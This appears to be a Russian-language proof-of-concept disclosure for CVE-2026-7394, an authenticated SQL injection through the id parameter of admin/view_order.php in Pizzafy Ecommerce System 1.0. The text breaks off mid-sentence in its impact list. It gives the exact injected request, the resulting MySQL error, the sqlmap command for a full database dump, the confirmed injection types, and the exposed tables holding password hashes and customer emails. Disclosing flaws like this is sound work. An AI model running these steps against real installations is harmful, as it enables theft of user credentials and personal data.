
Доказательство концепции эксплуатации для CVE-2026-7394, уязвимости SQL-инъекции в SourceCodester Pizzafy Ecommerce System 1.0. Демонстрирует аутентифицированную SQLi администратора через параметр `id` в `admin/view_order.php`, позволяющую полный дамп базы данных, включая учётные данные пользователей и персональные данные (PII).
admin/view_order.php| Поле | Значение |
|---|
| Вендор | SourceCodester |
| Продукт | Pizzafy Ecommerce System на PHP и MySQL |
| Версия | 1.0 |
| Уязвимость | SQL-инъекция |
| CWE | CWE-89 |
| Оценка CVSSv3 | 7.2 (Высокая) |
| Вектор атаки | Сеть |
| Требуется аутентификация | Да (Администратор) |
| Исследователь | Xmyronn |
| Дата | 2026-04-11 |
Файл: Pizzafy/admin/view_order.php
Параметр: id (GET)
Эндпоинт admin/view_order.php в Pizzafy Ecommerce System 1.0 не выполняет надлежащую санитизацию GET-параметра id перед передачей его в MySQL-запрос. Аутентифицированный администратор может манипулировать этим параметром для внедрения произвольного SQL-кода, что приводит к полной компрометации базы данных.
Перейдите по адресу:
http://localhost/pizzafy/Pizzafy/admin/index.php
Войдите, используя учётные данные администратора.
http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders

Нажмите View Order в любой записи заказа.

Перехваченный GET-запрос выглядит следующим образом:

Измените id=1 на id=':

GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1
Ответ — раскрыта ошибка MySQL:
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right
syntax to use near ''' at line 1 in
C:\xampp\htdocs\pizzafy\Pizzafy\admin\view_order.php:15
Сохраните запрос в файл view_order.txt и выполните:
sqlmap -r view_order.txt --dump --batch

sqlmap подтвердил типы инъекций:
| Тип | Название |
|---|---|
| Слепая инъекция на основе логических условий | AND boolean-based blind — WHERE clause |
| Инъекция на основе ошибок | MySQL >= 5.0 FLOOR error-based |
| Слепая инъекция на основе времени | MySQL >= 5.0.12 SLEEP |
| UNION-запрос | Generic UNION query — 11 columns |
Полный дамп базы данных:
Database: pizzafy
Tables: users, user_info, orders, order_list, product_list, category_list, system_settings
Раскрытые конфиденциальные данные включают bcrypt-хеши паролей, адреса электронной почты клиентов, детали заказов и системную конфигурацию.
Вредоносный аутентифицированный администратор (или злоумышленник, завладевший учётными данными администратора) может: